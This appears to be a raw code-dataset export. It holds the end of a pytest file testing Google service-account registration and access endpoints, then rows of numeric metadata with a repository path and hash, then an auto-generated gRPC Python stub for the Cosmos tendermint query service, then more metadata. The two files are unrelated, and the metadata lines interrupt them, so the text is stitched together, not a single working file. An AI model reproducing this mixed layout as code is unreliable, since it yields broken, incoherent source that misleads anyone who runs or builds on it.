assert str(response.status_code).startswith("2")
assert "success" in response.json
assert response.json.get("success")
service_account_accesses = (
db_session.query(ServiceAccountToGoogleBucketAccessGroup).filter_by(
service_account_id=service_account.id
)
).all()
# ensure access is the same as before even though it was valid (since it's
# the dry_run endpoint)
assert len(service_account_accesses) == len(
register_user_service_account["bucket_access_groups"]
)
def test_patch_service_account_dry_run_invalid(
client,
app,
db_session,
encoded_jwt_service_accounts_access,
register_user_service_account,
user_can_manage_service_account_mock,
invalid_user_service_account_mock,
revoke_user_service_account_from_google_mock,
add_user_service_account_to_google_mock,
):
"""
Test that patching against dry_run when it would be invalid does not modify access.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
service_account = register_user_service_account["service_account"]
response = client.patch(
"/google/service_accounts/_dry_run/{}".format(quote(service_account.email)),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
data=json.dumps({"project_access": ["this-project-doesnt-exist"]}),
)
# check if success
assert str(response.status_code).startswith("4")
assert "success" in response.json
assert not response.json.get("success")
service_account_accesses = (
db_session.query(ServiceAccountToGoogleBucketAccessGroup).filter_by(
service_account_id=service_account.id
)
).all()
# ensure access is the same
assert len(service_account_accesses) == len(
register_user_service_account["bucket_access_groups"]
)
def test_patch_service_account_remove_all_access(
client,
app,
db_session,
encoded_jwt_service_accounts_access,
register_user_service_account,
user_can_manage_service_account_mock,
valid_user_service_account_mock,
revoke_user_service_account_from_google_mock,
add_user_service_account_to_google_mock,
):
"""
Test that patching with project_access as empty list successfully removes
all projects the service account currently has access to.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
service_account = register_user_service_account["service_account"]
response = client.patch(
"/google/service_accounts/{}".format(quote(service_account.email)),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
data=json.dumps({"project_access": []}),
)
# check if success
assert str(response.status_code).startswith("2")
service_account_accesses = (
db_session.query(ServiceAccountToGoogleBucketAccessGroup).filter_by(
service_account_id=service_account.id
)
).all()
# ensure access is the same
assert len(service_account_accesses) == 0
def test_invalid_service_account_dry_run_errors(
cloud_manager,
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
db_session,
):
"""
Test that an invalid service account gives us the expected error structure
"""
valid_service_account_patcher[
"service_account_has_external_access"
].return_value = True
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts/_dry_run",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code != 200
_assert_expected_error_response_structure(response, project_access)
def test_invalid_service_account_has_external_access(
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
cloud_manager,
):
"""
Test that an invalid service account gives us the expected error structure
"""
sa_patcher = valid_service_account_patcher
proj_patcher = valid_google_project_patcher
sa_patcher["service_account_has_external_access"].return_value = True
proj_patcher["get_service_account_ids_from_google_members"].return_value = [
"test123@test.com"
]
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "0", "email": "test123@test.com"}
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code == 400
_assert_expected_error_response_structure(response, project_access)
assert response.json["errors"]["service_account_email"]["status"] == 403
def test_invalid_service_account_has_invalid_type(
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
cloud_manager,
):
"""
Test that an invalid service account gives us the expected error structure
"""
valid_service_account_patcher["is_valid_service_account_type"].return_value = False
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "0", "email": "test123@test.com"}
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code == 400
_assert_expected_error_response_structure(response, project_access)
assert response.json["errors"]["service_account_email"]["status"] == 403
def test_invalid_service_account_not_owned_by_project(
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
cloud_manager,
):
"""
Test that an invalid service account gives us the expected error structure
"""
(
valid_service_account_patcher[
"is_service_account_from_google_project"
].return_value
) = False
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "0", "email": "test123@test.com"}
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code == 400
_assert_expected_error_response_structure(response, project_access)
assert response.json["errors"]["service_account_email"]["status"] == 403
def test_invalid_get_google_project_parent_org(
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
cloud_manager,
):
"""
Test that an invalid service account gives us the expected error structure
"""
(
valid_google_project_patcher["get_google_project_parent_org"].return_value
) = "some-parent-org"
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "0", "email": "test123@test.com"}
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code == 400
_assert_expected_error_response_structure(response, project_access)
assert response.json["errors"]["google_project_id"]["status"] == 403
def test_valid_get_google_project_parent_org(
cloud_manager,
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
monkeypatch,
):
"""
Test that a valid service account gives us the expected response when it has
parent org BUT that org is whitelisted.
"""
monkeypatch.setitem(
config, "WHITE_LISTED_GOOGLE_PARENT_ORGS", ["whitelisted-parent-org"]
)
(
valid_google_project_patcher["get_google_project_parent_org"].return_value
) = "whitelisted-parent-org"
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "0", "email": "test123@test.com"}
valid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 200
def test_invalid_google_project_has_invalid_membership(
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
cloud_manager,
):
"""
Test that an invalid service account gives us the expected error structure
"""
valid_google_project_patcher[
"get_google_project_valid_users_and_service_accounts"
].side_effect = Exception()
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
db_session.add(Project(auth_id="project_a"))
db_session.add(Project(auth_id="project_b"))
db_session.commit()
project_access = ["project_a", "project_b"]
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "0", "email": "test123@test.com"}
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code == 400
_assert_expected_error_response_structure(response, project_access)
assert response.json["errors"]["google_project_id"]["status"] == 403
def test_invalid_google_project_no_access(
client,
app,
encoded_jwt_service_accounts_access,
valid_service_account_patcher,
valid_google_project_patcher,
db_session,
):
"""
Test that an invalid service account gives us the expected error structure
"""
(
valid_google_project_patcher["do_all_users_have_access_to_project"].return_value
) = False
(
valid_google_project_patcher[
"get_project_access_from_service_accounts"
].return_value
) = []
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
project_access = ["project_a", "project_b"]
invalid_service_account = {
"service_account_email": "test123@test.com",
"google_project_id": "some-google-project-872340ajsdkj",
"project_access": project_access,
}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(invalid_service_account),
content_type="application/json",
)
assert response.status_code == 400
_assert_expected_error_response_structure(response, project_access)
assert response.json["errors"]["project_access"]["status"] != 200
def test_service_account_registration_expires_in(
app,
db_session,
client,
encoded_jwt_service_accounts_access,
cloud_manager,
valid_google_project_patcher,
valid_service_account_patcher,
):
"""
Test that a service account registration with a valid expires_in is
successful, and that a registration with an invalid expires_in is not.
"""
project = Project(id=1, auth_id="some_auth_id")
bucket = Bucket(id=1)
db_session.add(project)
db_session.add(bucket)
db_session.commit()
project_to_bucket = ProjectToBucket(project_id=1, bucket_id=1)
db_session.add(project_to_bucket)
db_session.commit()
gbag = GoogleBucketAccessGroup(id=1, bucket_id=1, email="gbag@gmail.com")
db_session.add(gbag)
db_session.commit()
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
project_access = ["some_auth_id"]
valid_service_account = {
"service_account_email": "sa@gmail.com",
"google_project_id": "project-id",
"project_access": project_access,
}
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "sa_unique_id", "email": "sa@gmail.com"}
(
cloud_manager.return_value.__enter__.return_value.add_member_to_group.return_value
) = {"email": "sa@gmail.com"}
assert len(db_session.query(UserServiceAccount).all()) == 0
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 0
assert len(db_session.query(ServiceAccountToGoogleBucketAccessGroup).all()) == 0
# valid expires_in: should succeed
requested_exp = 60
response = client.post(
"/google/service_accounts?expires_in={}".format(requested_exp),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 200 # check if success
assert len(db_session.query(UserServiceAccount).all()) == 1
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 1
sa_to_bucket_entries = db_session.query(
ServiceAccountToGoogleBucketAccessGroup
).all()
assert len(sa_to_bucket_entries) == 1
# make sure the access was granted for the requested time
# (allow up to 10 sec for runtime)
diff = sa_to_bucket_entries[0].expires - int(time.time())
assert requested_exp <= diff <= requested_exp + 10
# invalid expires_in: should fail
requested_exp = "abc" # expires_in must be int >0
response = client.post(
"/google/service_accounts?expires_in={}".format(requested_exp),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 400 # check if failure
def test_valid_service_account_registration(
app,
db_session,
client,
encoded_jwt_service_accounts_access,
cloud_manager,
valid_google_project_patcher,
valid_service_account_patcher,
):
"""
Test that a valid service account registration request returns
200 and succesfully creates entries in database
"""
project = Project(id=1, auth_id="some_auth_id")
bucket = Bucket(id=1)
db_session.add(project)
db_session.add(bucket)
db_session.commit()
project_to_bucket = ProjectToBucket(project_id=1, bucket_id=1)
db_session.add(project_to_bucket)
db_session.commit()
gbag = GoogleBucketAccessGroup(id=1, bucket_id=1, email="gbag@gmail.com")
db_session.add(gbag)
db_session.commit()
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
project_access = ["some_auth_id"]
valid_service_account = {
"service_account_email": "sa@gmail.com",
"google_project_id": "project-id",
"project_access": project_access,
}
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "sa_unique_id", "email": "sa@gmail.com"}
(
cloud_manager.return_value.__enter__.return_value.add_member_to_group.return_value
) = {"email": "sa@gmail.com"}
assert len(db_session.query(UserServiceAccount).all()) == 0
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 0
assert len(db_session.query(ServiceAccountToGoogleBucketAccessGroup).all()) == 0
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 200
assert len(db_session.query(UserServiceAccount).all()) == 1
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 1
assert len(db_session.query(ServiceAccountToGoogleBucketAccessGroup).all()) == 1
def test_valid_service_account_registration_multiple_service_accounts(
app,
db_session,
client,
encoded_jwt_service_accounts_access,
cloud_manager,
valid_google_project_patcher,
valid_service_account_patcher,
):
"""
Test that a valid service account registration request returns
200 and succesfully creates entries in database when the Google project
has both another valid service account in the project and a Google-managed
system service account.
"""
proj_patcher = valid_google_project_patcher
project = Project(id=1, auth_id="some_auth_id")
bucket = Bucket(id=1)
db_session.add(project)
db_session.add(bucket)
db_session.commit()
project_to_bucket = ProjectToBucket(project_id=1, bucket_id=1)
db_session.add(project_to_bucket)
db_session.commit()
gbag = GoogleBucketAccessGroup(id=1, bucket_id=1, email="gbag@gmail.com")
db_session.add(gbag)
db_session.commit()
google_project_id = "project-id"
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
project_access = ["some_auth_id"]
proj_patcher["get_service_account_ids_from_google_members"].return_value = [
"test-{}@test.com".format(google_project_id),
"{}@compute-system.iam.gserviceaccount.com".format(google_project_id),
]
valid_service_account = {
"service_account_email": "sa@gmail.com",
"google_project_id": google_project_id,
"project_access": project_access,
}
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "sa_unique_id", "email": "sa@gmail.com"}
(
cloud_manager.return_value.__enter__.return_value.add_member_to_group.return_value
) = {"email": "sa@gmail.com"}
assert len(db_session.query(UserServiceAccount).all()) == 0
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 0
assert len(db_session.query(ServiceAccountToGoogleBucketAccessGroup).all()) == 0
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 200
assert len(db_session.query(UserServiceAccount).all()) == 1
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 1
assert len(db_session.query(ServiceAccountToGoogleBucketAccessGroup).all()) == 1
def test_register_service_account_already_exists(
app,
db_session,
client,
encoded_jwt_service_accounts_access,
cloud_manager,
valid_google_project_patcher,
valid_service_account_patcher,
):
project = Project(id=1, auth_id="some_auth_id")
bucket = Bucket(id=1)
db_session.add(project)
db_session.add(bucket)
db_session.commit()
project_to_bucket = ProjectToBucket(project_id=1, bucket_id=1)
db_session.add(project_to_bucket)
db_session.commit()
gbag = GoogleBucketAccessGroup(id=1, bucket_id=1, email="gbag@gmail.com")
db_session.add(gbag)
db_session.commit()
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
project_access = ["some_auth_id"]
valid_service_account = {
"service_account_email": "sa@gmail.com",
"google_project_id": "project-id",
"project_access": project_access,
}
(
cloud_manager.return_value.__enter__.return_value.get_service_account.return_value
) = {"uniqueId": "sa_unique_id", "email": "sa@gmail.com"}
(
cloud_manager.return_value.__enter__.return_value.add_member_to_group.return_value
) = {"email": "sa@gmail.com"}
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 200
response = client.post(
"/google/service_accounts",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
data=json.dumps(valid_service_account),
content_type="application/json",
)
assert response.status_code == 400
assert response.json["errors"]["service_account_email"]["status"] == 409
assert len(db_session.query(UserServiceAccount).all()) == 1
assert len(db_session.query(ServiceAccountAccessPrivilege).all()) == 1
assert len(db_session.query(ServiceAccountToGoogleBucketAccessGroup).all()) == 1
def _assert_expected_service_account_response_structure(data):
assert "service_account_email" in data
assert "google_project_id" in data
assert "project_access" in data
assert hasattr(data["project_access"], "__iter__")
def _assert_expected_error_response_structure(response, project_access):
assert "success" in response.json
assert "errors" in response.json
assert "service_account_email" in response.json["errors"]
_assert_expected_error_info_structure(
response.json["errors"]["service_account_email"]
)
assert "google_project_id" in response.json["errors"]
_assert_expected_error_info_structure(response.json["errors"]["google_project_id"])
assert "project_access" in response.json["errors"]
_assert_expected_error_info_structure(response.json["errors"]["project_access"])
def _assert_expected_error_info_structure(data):
assert EXPECTED_ERROR_RESPONSE_KEYS.issubset(list(data.keys()))
| 32.963913
| 90
| 0.70047
| 4,051
| 34,711
| 5.611701
| 0.067884
| 0.122553
| 0.028373
| 0.043989
| 0.885277
| 0.853517
| 0.829323
| 0.813047
| 0.797563
| 0.781727
| 0
| 0.009023
| 0.20178
| 34,711
| 1,052
| 91
| 32.995247
| 0.811456
| 0.13768
| 0
| 0.760929
| 0
| 0
| 0.169977
| 0.069527
| 0
| 0
| 0
| 0
| 0.122951
| 1
| 0.031421
| false
| 0
| 0.012295
| 0
| 0.043716
| 0.001366
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c640b07c99a6dd642a4d4e997e555fffcde3b36
| 12,460
|
py
|
Python
|
cosmpy/protos/cosmos/base/tendermint/v1beta1/query_pb2_grpc.py
|
evsmithx/cosmpy
|
7dfc81528b287f90190d6d4387942340f8ab88cf
|
[
"Apache-2.0"
] | 15
|
2021-09-08T05:27:14.000Z
|
2022-03-29T06:48:08.000Z
|
cosmpy/protos/cosmos/base/tendermint/v1beta1/query_pb2_grpc.py
|
evsmithx/cosmpy
|
7dfc81528b287f90190d6d4387942340f8ab88cf
|
[
"Apache-2.0"
] | 39
|
2021-08-19T20:09:35.000Z
|
2022-03-22T19:51:59.000Z
|
cosmpy/protos/cosmos/base/tendermint/v1beta1/query_pb2_grpc.py
|
evsmithx/cosmpy
|
7dfc81528b287f90190d6d4387942340f8ab88cf
|
[
"Apache-2.0"
] | 5
|
2021-11-02T16:23:48.000Z
|
2022-01-20T22:30:05.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from cosmos.base.tendermint.v1beta1 import query_pb2 as cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2
class ServiceStub(object):
"""Service defines the gRPC querier service for tendermint queries.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetNodeInfo = channel.unary_unary(
'/cosmos.base.tendermint.v1beta1.Service/GetNodeInfo',
request_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetNodeInfoRequest.SerializeToString,
response_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetNodeInfoResponse.FromString,
)
self.GetSyncing = channel.unary_unary(
'/cosmos.base.tendermint.v1beta1.Service/GetSyncing',
request_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetSyncingRequest.SerializeToString,
response_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetSyncingResponse.FromString,
)
self.GetLatestBlock = channel.unary_unary(
'/cosmos.base.tendermint.v1beta1.Service/GetLatestBlock',
request_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestBlockRequest.SerializeToString,
response_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestBlockResponse.FromString,
)
self.GetBlockByHeight = channel.unary_unary(
'/cosmos.base.tendermint.v1beta1.Service/GetBlockByHeight',
request_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetBlockByHeightRequest.SerializeToString,
response_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetBlockByHeightResponse.FromString,
)
self.GetLatestValidatorSet = channel.unary_unary(
'/cosmos.base.tendermint.v1beta1.Service/GetLatestValidatorSet',
request_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestValidatorSetRequest.SerializeToString,
response_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestValidatorSetResponse.FromString,
)
self.GetValidatorSetByHeight = channel.unary_unary(
'/cosmos.base.tendermint.v1beta1.Service/GetValidatorSetByHeight',
request_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetValidatorSetByHeightRequest.SerializeToString,
response_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetValidatorSetByHeightResponse.FromString,
)
class ServiceServicer(object):
"""Service defines the gRPC querier service for tendermint queries.
"""
def GetNodeInfo(self, request, context):
"""GetNodeInfo queries the current node info.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetSyncing(self, request, context):
"""GetSyncing queries node syncing.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetLatestBlock(self, request, context):
"""GetLatestBlock returns the latest block.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetBlockByHeight(self, request, context):
"""GetBlockByHeight queries block for given height.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetLatestValidatorSet(self, request, context):
"""GetLatestValidatorSet queries latest validator-set.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetValidatorSetByHeight(self, request, context):
"""GetValidatorSetByHeight queries validator-set at a given height.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetNodeInfo': grpc.unary_unary_rpc_method_handler(
servicer.GetNodeInfo,
request_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetNodeInfoRequest.FromString,
response_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetNodeInfoResponse.SerializeToString,
),
'GetSyncing': grpc.unary_unary_rpc_method_handler(
servicer.GetSyncing,
request_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetSyncingRequest.FromString,
response_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetSyncingResponse.SerializeToString,
),
'GetLatestBlock': grpc.unary_unary_rpc_method_handler(
servicer.GetLatestBlock,
request_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestBlockRequest.FromString,
response_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestBlockResponse.SerializeToString,
),
'GetBlockByHeight': grpc.unary_unary_rpc_method_handler(
servicer.GetBlockByHeight,
request_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetBlockByHeightRequest.FromString,
response_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetBlockByHeightResponse.SerializeToString,
),
'GetLatestValidatorSet': grpc.unary_unary_rpc_method_handler(
servicer.GetLatestValidatorSet,
request_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestValidatorSetRequest.FromString,
response_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestValidatorSetResponse.SerializeToString,
),
'GetValidatorSetByHeight': grpc.unary_unary_rpc_method_handler(
servicer.GetValidatorSetByHeight,
request_deserializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetValidatorSetByHeightRequest.FromString,
response_serializer=cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetValidatorSetByHeightResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'cosmos.base.tendermint.v1beta1.Service', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Service(object):
"""Service defines the gRPC querier service for tendermint queries.
"""
@staticmethod
def GetNodeInfo(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.base.tendermint.v1beta1.Service/GetNodeInfo',
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetNodeInfoRequest.SerializeToString,
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetNodeInfoResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetSyncing(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.base.tendermint.v1beta1.Service/GetSyncing',
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetSyncingRequest.SerializeToString,
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetSyncingResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetLatestBlock(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.base.tendermint.v1beta1.Service/GetLatestBlock',
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestBlockRequest.SerializeToString,
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestBlockResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetBlockByHeight(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.base.tendermint.v1beta1.Service/GetBlockByHeight',
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetBlockByHeightRequest.SerializeToString,
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetBlockByHeightResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetLatestValidatorSet(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.base.tendermint.v1beta1.Service/GetLatestValidatorSet',
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestValidatorSetRequest.SerializeToString,
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetLatestValidatorSetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetValidatorSetByHeight(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.base.tendermint.v1beta1.Service/GetValidatorSetByHeight',
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetValidatorSetByHeightRequest.SerializeToString,
cosmos_dot_base_dot_tendermint_dot_v1beta1_dot_query__pb2.GetValidatorSetByHeightResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 51.701245
| 148
| 0.71252
| 1,187
| 12,460
| 7.049705
| 0.100253
| 0.036329
| 0.057481
| 0.070746
| 0.83162
| 0.827557
| 0.804852
| 0.777605
| 0.741037
| 0.741037
| 0
| 0.014473
| 0.223676
| 12,460
| 240
| 149
| 51.916667
| 0.850615
| 0.06236
| 0
| 0.5
| 1
| 0
| 0.093009
| 0.064822
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072917
| false
| 0
| 0.010417
| 0.03125
| 0.130208
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
